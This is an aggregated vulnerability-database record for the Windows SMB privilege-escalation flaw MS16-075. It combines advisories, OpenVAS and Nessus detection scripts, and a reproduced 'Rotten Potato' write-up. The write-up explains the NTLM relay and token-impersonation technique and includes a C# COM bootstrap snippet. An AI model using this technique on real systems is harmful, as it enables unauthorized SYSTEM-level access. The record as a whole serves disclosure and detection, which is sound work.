ID CVE-2016-3225 Type cve Reporter cve@mitre.org Modified 2018-10-12T22:12:00
Description
The SMB server component in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, and Windows 10 Gold and 1511 allows local users to gain privileges via a crafted application that forwards an authentication request to an unintended service, aka "Windows SMB Server Elevation of Privilege Vulnerability."
{"id": "CVE-2016-3225", "bulletinFamily": "NVD", "title": "CVE-2016-3225", "description": "The SMB server component in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, and Windows 10 Gold and 1511 allows local users to gain privileges via a crafted application that forwards an authentication request to an unintended service, aka \"Windows SMB Server Elevation of Privilege Vulnerability.\"", "published": "2016-06-16T01:59:00", "modified": "2018-10-12T22:12:00", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3225", "reporter": "cve@mitre.org", "references": ["http://www.securitytracker.com/id/1036110", "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2016/ms16-075", "https://www.exploit-db.com/exploits/45562/"], "cvelist": ["CVE-2016-3225"], "type": "cve", "lastseen": "2020-10-03T12:10:44", "edition": 3, "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-91080"]}, {"type": "seebug", "idList": ["SSV:93043"]}, {"type": "zdt", "idList": ["1337DAY-ID-31263"]}, {"type": "mskb", "idList": ["KB3164038"]}, {"type": "mscve", "idList": ["MS:CVE-2016-3225"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310807340"]}, {"type": "nessus", "idList": ["SMB_NT_MS16-075.NASL"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/LOCAL/MS16_075_REFLECTION", "MSF:EXPLOIT/WINDOWS/LOCAL/MS16_075_REFLECTION_JUICY"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:151182", "PACKETSTORM:149689"]}, {"type": "exploitdb", "idList": ["EDB-ID:45562"]}, {"type": "kaspersky", "idList": ["KLA10825", "KLA11911"]}], "modified": "2020-10-03T12:10:44", "rev": 2}, "score": {"value": 6.1, "vector": "NONE", "modified": "2020-10-03T12:10:44", "rev": 2}, "vulnersScore": 6.1}, "cpe": ["cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_vista:*", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_7:*"], "affectedSoftware": [{"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_7", "name": "microsoft windows 7", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_8.1", "name": "microsoft windows 8.1", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_vista", "name": "microsoft windows vista", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_rt_8.1", "name": "microsoft windows rt 8.1", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1511"}], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 6.9, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 3.4, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_vista:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"], "cwe": ["CWE-264"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_vista:*:sp2:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}}
{"symantec": [{"lastseen": "2018-03-14T22:40:58", "bulletinFamily": "software", "cvelist": ["CVE-2016-3225"], "description": "### Description\n\nMicrosoft Windows is prone to a local privilege-escalation vulnerability. A local attacker can exploit this issue to execute arbitrary code with elevated privileges.\n\n### Technologies Affected\n\n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Vista SP2 \n * Microsoft Windows Vista x64 Edition Service Pack 2 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nTo exploit this vulnerability, an attacker requires local access to an affected computer. Grant local access for trusted and accountable users only.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2016-06-14T00:00:00", "published": "2016-06-14T00:00:00", "id": "SMNTC-91080", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/91080", "type": "symantec", "title": "Microsoft Windows Server Message Block CVE-2016-3225 Local Privilege Escalation Vulnerability", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T11:58:04", "description": "## Overview\r\n\r\nAs we mentioned a number of times throughout our talk, this work is derived directly from James Forshaw\u2019s [BlackHat talk](https://www.youtube.com/watch?v=QRpfvmMbDMg) and [Google Project Zero research](https://bugs.chromium.org/p/project-zero/issues/detail?id=325&redir=1). I highly recommend reviewing both of these resources to anyone interested in pursuing this topic.\r\n\r\nThe idea behind this vulnerability is simple to describe at a high level:\r\n\r\n1. Trick the \u201cNT AUTHORITY\\SYSTEM\u201d account into authenticating via NTLM to a TCP endpoint we control.\r\n2. Man-in-the-middle this authentication attempt (NTLM relay) to locally negotiate a security token for the \u201cNT AUTHORITY\\SYSTEM\u201d account. This is done through a series of Windows API calls.\r\n3. Impersonate the token we have just negotiated. This can only be done if the attackers current account has the privilege to impersonate security tokens. This is usually true of most service accounts and not true of most user-level accounts.\r\n\r\nEach of these steps are described in the following 3 sections.\r\n\r\n## NTLM Relay to Local Negotiation\r\n\r\nNTLM relay from the local \u201cNT AUTHORITY\\SYSTEM\u201d (we will just call it SYSTEM for brevity) account back to some other system service has been the theme for the Potato privilege escalation exploits. The first step is to trick the SYSTEM account into performing authentication to some TCP listener we control.\r\n\r\nIn the original [Hot Potato exploit](https://foxglovesecurity.com/2016/01/16/hot-potato/), we did some complex magic with NBNS spoofing, WPAD, and Windows Update services to trick it into authenticating to us over HTTP. For more information, see the original blog post.\r\n\r\nToday, we\u2019ll be discussing another method to accomplish the same end goal which James Forshaw discussed [here](https://bugs.chromium.org/p/project-zero/issues/detail?id=325&redir=1). We\u2019ll basically be tricking DCOM/RPC into NTLM authenticating to us. The advantage of this more complex method is that it is 100% reliable, consistent across Windows versions, and fires instantly rather than sometimes having to wait for Windows Update.\r\n\r\n### Getting Started\r\n\r\nWe\u2019ll be abusing an API call to COM to get this all kicked off. The call is \u201cCoGetInstanceFromIStorage\u201d and to give you some context, here is the relevant code:\r\n\r\n<pre class=\"brush: cpp; title: ; notranslate\" title=\"\">public static void BootstrapComMarshal()\r\n{\r\nIStorage stg = ComUtils.CreateStorage();\r\n\r\n// Use a known local system service COM server, in this cast BITSv1\r\nGuid clsid = new Guid(\"4991d34b-80a1-4291-83b6-3328366b9097\");\r\n\r\nTestClass c = new TestClass(stg, String.Format(\"{0}[{1}]\", \"127.0.0.1\", 6666)); // ip and port\r\n\r\nMULTI_QI[] qis = new MULTI_QI[1];\r\n\r\nqis[0].pIID = ComUtils.IID_IUnknownPtr;\r\nqis[0].pItf = null;\r\nqis[0].hr = 0;\r\n\r\nCoGetInstanceFromIStorage(null, ref clsid, null, CLSCTX.CLSCTX_LOCAL_SERVER, c, 1, qis);\r\n}\r\n\r\n</pre>\r\n\r\nI\u2019m far from being an expert on COM. The \u201cCoGetInstanceFromIStorage\u201d call attempts to fetch an instance of the specified object from a location specified by the caller. Here we are telling COM we want an instance of the BITS object and we want to load it from 127.0.0.1 on port 6666.\r\n\r\nIt\u2019s actually a little more complex than that, because really we\u2019re fetching the object from an \u201cIStorage\u201d object, not just passing a host/port directly. In the code above \u201cTestClass\u201d is actually an instance of an IStorage object in which we\u2019ve replaced some bits and pieces to point back to \u201c127.0.0.1:6666\u201d.\r\n\r\n### Man-In-The-Middle\r\n\r\nSo, now we have COM trying to talk to us on port 6666 where we\u2019ve spun up a local TCP listener. If we reply in the correct way, we have have COM (running as the SYSTEM account) try to perform NTLM authentication with us.\r\n\r\nCOM is trying to talk to us using the RPC protocol. I\u2019m not particularly fluent in RPC and wouldn\u2019t be surprised if there were slight variations based on Windows versions. In order to avoid many headaches, we\u2019re going to use a trick in order to craft our replies. What we will do is relay any packets we receive from COM on TCP port 6666, back to the local Windows RPC listener on TCP port 135\\. Since these packets we\u2019re receiving are part of a valid RPC conversation, whatever version of Windows we are running will respond appropriately. We can then use these packets we receive back from Windows RPC on TCP 135 as templates for our replies to COM.\r\n\r\nIf that\u2019s not clear, the following shows the first few packets of this exchange in WireShark:\r\n\r\n\r\n\r\nNotice that the first packet we receive (packet #7) is incoming on port 6666 (our listener, this is COM talking to us). Next, we relay that same packet (packet #9) to RPC on TCP 135\\. Then in packet #11, we get a reply back from RPC (TCP 135), and in packet #13, we relay that reply to COM.\r\n\r\nWe simply repeat this process until it\u2019s time for NTLM authentication to occur. You can think of these initial packets as just setting the stage for the eventual NTLM auth.\r\n\r\n### NTLM Relay and Local Token Negotiation\r\n\r\nBefore we dive into the NTLM relay details, let\u2019s look at it at a high level. The following is from our slide deck:\r\n\r\n\r\n\r\nOn the left in blue are the packets that COM is going to send to us on TCP port 6666\\. On the right, in red, are the Windows API calls that we\u2019re going to make using data that we pull out of those packets.\r\n\r\nLet\u2019s look a little closer at the API calls on the right, since most people will not be familiar with them. In order to locally negotiate a security token using NTLM authentication, one must first call the function \u201cAcquireCredentialsHandle\u201d to get a handle to the data structure we will need.\r\n\r\nNext, we call \u201cAcceptSecurityContext\u201d, and the input to this function will be the NTLM Type 1 (Negotiate) message. The output will be an NTLM Type 2 (Challenge) message which is sent back to the client trying to authenticate, in this case, DCOM.\r\n\r\nWhen the client responds with an NTLM Type 3 (Authenticate) message, we then pass that to a second call to \u201cAcceptSecurityContext\u201d to complete the authentication process and get a token.\r\n\r\nLet\u2019s look at the packet capture and break this all down\u2026\r\n\r\n#### Type 1 (Negotiate) Packet\r\n\r\nAfter relaying a few packets between RPC and COM, eventually COM is going to try to initiate NTLM authentication with us by sending the NTLM Type 1 (Negotiate) message, as shown in packet #29 of the packet capture below:\r\n\r\n\r\n\r\nThis is where things start to get interesting. Again, we relay this to RPC (on TCP 135), and RPC will reply with an NTLM Challenge.\r\n\r\nBut there\u2019s one more thing going on here that you don\u2019t see in the packet capture. When we receive the NTLM Type 1 (Negotiate) message from COM, we rip out the NTLM section of the packet (as shown below), and use it to begin the process of locally negotiating a token:\r\n\r\n\r\n\r\nSo, as discussed above, we call \u201cAcquireCredentialsHandle\u201d, and then \u201cAcceptSecurityContext\u201d, passing as input the NTLM Type 1 (Negotiate) message we pulled out of that packet.\r\n\r\n#### NTLM Type 2 (Challenge) Packet\r\n\r\nRecall that we forwarded the NTLM Type 1 (Negotiate) packet to RPC on port 135, RPC will now reply with an NTM Type 2 (Challenge) packet which can be seen in our packet capture above in packet #33\\. This time, we do NOT simply forward this packet back to COM, we need to do some work first.\r\n\r\nLet\u2019s take a closer look at the two NTLM Type 2 (Challenge) packets from the capture above:\r\n\r\n\r\n\r\nNotice the highlighted field \u201cNTLM Server Challenge\u201d and the field below it \u201cReserved\u201d, and that they differ in value. This would not be the case if we had simply forwarded the packet from RPC (on the left) to COM (the one on the right).\r\n\r\nRecall that when we made the Windows API call to \u201cAcceptSecurityContext\u201d, the output of that call was an NTLM Type 2 (Challenge) message. What we\u2019ve done here is replace the NTLM blob inside the packet that we are sending to COM with the result of that API call.\r\n\r\nWhy would we do this? Because we need COM, running as the SYSTEM account to authenticate using the NTLM challenge and \u201cReserved\u201d section that we are using to negotiate our local token, if we did not replace this section in the packet, then our call to \u201cAcceptSecurityContext\u201d would fail.\r\n\r\nWe\u2019ll talk more about how local NTLM authentication works later, but for now just know that the client who is trying to authenticate (in this case SYSTEM through COM) needs to do some magic with the \u201cNTLM Server Challenge\u201d and \u201cReserved\u201d sections of the NTLM Type 2 (Negotiate) packet, and that we\u2019ll only get our token if this magic is performed on the values produced by our call to \u201cAcceptSecurityContext\u201d.\r\n\r\n#### NTLM Type 3 (Authenticate) Packet\r\n\r\nSo now we\u2019ve forwarded the modified NTLM Type 2(Negotiate) packet to COM where the \u201cChallenge\u201d and \u201cReserved\u201d fields match the output from \u201cAcceptSecurityContext\u201d. The \u201cReserved\u201d field is actually a reference to a SecHandle, and when the SYSTEM account receives the NTLM Type 2 message, it will perform authentication behind the scenes in memory. That is why it is so crucial that we update the \u201cReserved\u201d field\u2026 Otherwise, it would be authenticating to RPC instead of US!\r\n\r\nOnce this is completed, COM on behalf of the SYSTEM account will send us back the NTLM Type 3 (Authenticate) packet. This will just be empty (because all the actual authentication here happened in memory), but we will use it to make our final call to \u201cAcceptSecurityContext\u201d.\r\n\r\nWe can then call \u201cImpersonateSecurityContext\u201d with the result of the final call above to get an impersonation token.\r\n\r\nSo now we\u2019ve forwarded the modified NTLM Type 2(Negotiate) packet to COM where the \u201cChallenge\u201d and \u201cReserved\u201d fields match the output from \u201cAcceptSecurityContext\u201d. The \u201cReserved\u201d field is actually a reference to a SecHandle, and when the SYSTEM account receives the NTLM Type 2 message, it will perform authentication behind the scenes in memory. That is why it is so crucial that we update the \u201cReserved\u201d field\u2026 Otherwise, it would be authenticating to RPC instead of US!\r\n\r\nOnce this is completed, COM on behalf of the SYSTEM account will send us back the NTLM Type 3 (Authenticate) packet. This will just be empty (because all the actual authentication here happened in memory), but we will use it to make our final call to \u201cAcceptSecurityContext\u201d.\r\n\r\nWe can then call \u201cImpersonateSecurityContext\u201d with the result of the final call above to get an impersonation token.\r\n\r\n## Using the ImpersonationToken\r\n\r\nThe following diagram (youtube play bar included) from James Forshaw\u2019s BlackHat talk [\u201cSocial Engineering the Windows Kernel\u201d](https://www.youtube.com/watch?v=QRpfvmMbDMg) shows the pre-requisites to impersonating the token that we have now negotiated:\r\n\r\n\r\n\r\nFrom this, it is clear that if we want to impersonate the token, we better be running as an account with SeImpersonate privilege (or equivalent). Luckily this includes many service accounts in Windows that penetration testers often end up running as. For example, the IIS and SQL Server accounts.", "published": "2017-04-25T00:00:00", "type": "seebug", "title": "MS16-075 Windows SMB Server Elevation of Privilege Vulnerability (CVE-2016-3225)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3225"], "modified": "2017-04-25T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-93043", "id": "SSV:93043", "sourceData": "", "sourceHref": "", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2020-06-10T19:47:32", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3225"], "description": "This host is missing an important security\n update according to Microsoft Bulletin MS16-075.", "modified": "2020-06-08T00:00:00", "published": "2016-06-15T00:00:00", "id": "OPENVAS:1361412562310807340", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807340", "type": "openvas", "title": "Microsoft Windows SMB Server Elevation of Privilege Vulnerability (3164038)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows SMB Server Elevation of Privilege Vulnerability (3164038)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807340\");\n script_version(\"2020-06-08T14:40:48+0000\");\n script_cve_id(\"CVE-2016-3225\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-08 14:40:48 +0000 (Mon, 08 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-06-15 10:15:16 +0530 (Wed, 15 Jun 2016)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft Windows SMB Server Elevation of Privilege Vulnerability (3164038)\");\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft Bulletin MS16-075.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"An elevation of privilege flaw exists\n in the Microsoft Server Message Block (SMB) when an attacker forwards an\n authentication request intended for another service running on the same\n machine.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code with elevated permissions.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 x32/x64\n\n - Microsoft Windows Server 2012\n\n - Microsoft Windows 8.1 x32/x64\n\n - Microsoft Windows Server 2012 R2\n\n - Microsoft Windows 7 x32/x64 Service Pack 1\n\n - Microsoft Windows Vista x32/x64 Service Pack 2\n\n - Microsoft Windows Server 2008 R2 x64 Service Pack 1\n\n - Microsoft Windows Server 2008 x32/x64 Service Pack 2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-in/kb/3164038\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/library/security/MS16-075\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(winVista:3, win7:2, win7x64:2, win2008:3, win2008r2:2, win8:1,\n win8x64:1, win2012:1, win2012R2:1, win8_1:1, win8_1x64:1, win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nsysVer = fetch_file_version(sysPath:sysPath, file_name:\"drivers\\mrxsmb10.sys\");\nif(!sysVer){\n exit(0);\n}\n\nif (sysVer =~ \"^6\\.0\\.6002\\.1\"){\n Vulnerable_range = \"Less than 6.0.6002.19431\";\n}\nelse if (sysVer =~ \"^6\\.0\\.6002\\.2\"){\n Vulnerable_range = \"6.0.6002.23000 - 6.0.6002.23973\";\n}\nelse if (sysVer =~ \"^6\\.1\\.7601\\.2\"){\n Vulnerable_range = \"Less than 6.1.7601.23452\";\n}\n\nelse if (sysVer =~ \"^6\\.2\\.9200\\.2\"){\n Vulnerable_range = \"Less than - 6.2.9200.21529\";\n}\nelse if (sysVer =~ \"^6\\.3\\.9600\\.1\"){\n Vulnerable_range = \"Less than 6.3.9600.18298\";\n}\nelse if (sysVer =~ \"^10\\.0\\.10240\"){\n Vulnerable_range = \"Less than 10.0.10240.16683\";\n}\nelse if (sysVer =~ \"^10\\.0\\.10586\"){\n Vulnerable_range = \"10.0.10586.0 - 10.0.10586.102\";\n}\n\nif(hotfix_check_sp(winVista:3, win2008:3) > 0)\n{\n if(version_is_less(version:sysVer, test_version:\"6.0.6002.19431\")||\n version_in_range(version:sysVer, test_version:\"6.0.6002.23000\", test_version2:\"6.0.6002.23973\")){\n VULN = TRUE ;\n }\n}\n\nelse if(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) > 0)\n{\n if(version_is_less(version:sysVer, test_version:\"6.1.7601.23452\")){\n VULN = TRUE ;\n }\n}\n\nelse if(hotfix_check_sp(win2012:1) > 0)\n{\n if(version_is_less(version:sysVer, test_version:\"6.2.9200.21529\")){\n VULN = TRUE ;\n }\n}\n\nelse if(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) > 0)\n{\n if(version_is_less(version:sysVer, test_version:\"6.3.9600.18298\")){\n VULN = TRUE ;\n }\n}\n\nif(VULN)\n{\n report = 'File checked: ' + sysPath + \"\\drivers\\mrxsmb10.sys\" + '\\n' +\n 'File version: ' + sysVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n}\n\n\nsysVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!sysVer){\n exit(0);\n}\n\nif(hotfix_check_sp(win10:1, win10x64:1) > 0)\n{\n if(version_is_less(version:sysVer, test_version:\"11.0.10240.16942\"))\n {\n Vulnerable_range = \"Less than 11.0.10240.16942\";\n VULN = TRUE ;\n }\n else if(version_in_range(version:sysVer, test_version:\"11.0.10586.0\", test_version2:\"11.0.10586.419\")) {\n Vulnerable_range = \"11.0.10586.419\";\n VULN = TRUE ;\n }\n}\n\nif(VULN)\n{\n report = 'File checked: ' + sysPath + \"\\edgehtml.dll\" + '\\n' +\n 'File version: ' + sysVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "mscve": [{"lastseen": "2020-08-07T11:45:28", "bulletinFamily": "microsoft", "cvelist": ["CVE-2016-3225"], "description": "An elevation of privilege vulnerability exists in the Microsoft Server Message Block (SMB) when an attacker forwards an authentication request intended for another service running on the same machine. An attacker who successfully exploited this vulnerability could execute arbitrary code with elevated permissions.\n\nTo exploit the vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system.\n\nThe update addresses the vulnerability by correcting how Windows SMB handles credential-forwarding requests.\n\n**Enable Extended Protection for Authentication (EPA) for SMB server.** **For customers running Windows Vista and Windows Server 2008:** You must have update 968389 installed on both client and server computers. To download the update, see [Microsoft Knowledge Base Article 968389](<https://support.microsoft.com/en-us/kb/968389>). You must also have update 2345886 installed on both client and server computers. If the update is not already installed on your system, you can download it from the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/Home.aspx>). After you install update 2345886, the EPA security feature is off by default as it may cause some application compatibility concerns. To enable EPA for SMB clients and servers, see the References section of [Microsoft Knowledge Base Article 2345886](<https://support.microsoft.com/en-us/kb/2345886>).\n\n**For customers running Windows 7 and Windows Server 2008 R2:** You must have update 2345886 installed on both client and server computers. If the update is not already installed on your system, you can download it from the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/Home.aspx>). After you install the update, the EPA security feature is off by default as it may cause some application compatibility concerns. To enable EPA for SMB clients and servers, see the References section of [Microsoft Knowledge Base Article 2345886](<https://support.microsoft.com/en-us/kb/2345886>). Note that the instructions in this article also apply to later releases of Microsoft Windows.\n\n**For customers running Windows 8 and later versions of Windows**: The EPA security feature is built into the operating system, but is off by default as it may cause some application compatibility concerns. To enable EPA for SMB clients and servers, see the References section of [Microsoft Knowledge Base Article 2345886](<https://support.microsoft.com/en-us/kb/2345886>). Note that the instructions in this article also apply to later releases of Microsoft Windows.\n\nThe following [mitigating factors](<https://technet.microsoft.com/library/security/dn848375.aspx#Mitigation>) may be helpful in your situation: An attacker must have valid logon credentials and be able to log on locally to exploit this vulnerability.\n", "edition": 3, "modified": "2016-08-18T07:00:00", "id": "MS:CVE-2016-3225", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3225", "published": "2016-08-18T07:00:00", "title": "Windows SMB Server Elevation of Privilege Vulnerability", "type": "mscve", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-01T05:43:49", "description": "The remote Windows host is missing a security update. It is,\ntherefore, affected by an elevation of privilege vulnerability in the\nMicrosoft Server Message Block (SMB) server when handling forwarded\ncredential requests that are intended for another service running\non the same host. An authenticated attacker can exploit this, via a\nspecially crafted application, to execute arbitrary code with elevated\npermissions.", "edition": 29, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2016-06-14T00:00:00", "title": "MS16-075: Security Update for Windows SMB Server (3164038)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3225"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS16-075.NASL", "href": "https://www.tenable.com/plugins/nessus/91603", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(91603);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2019/11/19\");\n\n script_cve_id(\"CVE-2016-3225\");\n script_bugtraq_id(91080);\n script_xref(name:\"MSFT\", value:\"MS16-075\");\n script_xref(name:\"MSKB\", value:\"3161561\");\n script_xref(name:\"MSKB\", value:\"3163017\");\n script_xref(name:\"MSKB\", value:\"3163018\");\n script_xref(name:\"IAVA\", value:\"2016-A-0150\");\n\n script_name(english:\"MS16-075: Security Update for Windows SMB Server (3164038)\");\n script_summary(english:\"Checks the version of the SYS 